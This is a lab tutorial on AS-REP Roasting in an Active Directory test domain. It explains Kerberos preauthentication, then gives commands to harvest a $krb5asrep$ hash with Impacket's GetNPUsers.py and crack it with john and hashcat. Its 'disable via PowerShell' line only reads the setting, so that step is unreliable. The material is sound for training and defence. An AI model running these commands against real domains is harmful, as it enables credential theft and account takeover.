7.2 - AS-REP Roasting
AS-REP Roasting
AS-REP Roasting exploits accounts for which Kerberos preauthentication is disabled. In a typical Kerberos authentication process, the client must send a timestamp encrypted with its password-derived key. This serves as proof that the authentication request is not being replayed.
However, if preauthentication is disabled, the client does not need to send this encrypted timestamp. As a result, an attacker can request a Ticket Granting Ticket (TGT) for the target user and receive an AS-REP message encrypted with the user’s password hash.
AS-REP Process
1) AS-REQ (Client -> KDC/AS)
- Timestamp 🔑 Encrypted with Client key (only if preauthentication is enabled)
2) AS-REP (KDC/AS -> Client)
- TGT 🔑 Encrypted with KDC key
- TGS Session Key 🔑 Encrypted with Client keyIn this case we can jump the first step because the preauth is disabled. Once an attacker captures the AS-REP, they can attempt to crack the user's password offline.
Example: Exploiting AS-REP Roasting
Step 1: Create a User
New-ADUser -Name "asrep" -SamAccountName "asrep" -UserPrincipalName "asrep@dev-angelist.lab" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $trueStep 2: Disable Preauthentication
Win + R -> dsa.msc
User -> Properties -> Account -> Account Options -> Do not require Kerberos preauthentication
Or via PowerShell:
Get-ADUser -Identity "asrep" -Properties DoesNotRequirePreAuth | Select-Object Name, DoesNotRequirePreAuth
Step 3: Perform AS-REP Roasting using Impacket
#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Perform AS-REP Roasting attack using the Impacket's module: GetNPUsers.py
GetNPUsers.py dev-angelist.lab/asrep -dc-ip corp-dc -no-pass | grep '\$krb5asrep\$' > as-rep.txt
Step 4: Crack the Ticket
john --wordlist=/home/kali/Documents/password.txt ./as-rep.txt
hashcat -m 18200 ./as-rep.txt /home/kali/Documents/password.txt
Other Resources
Last updated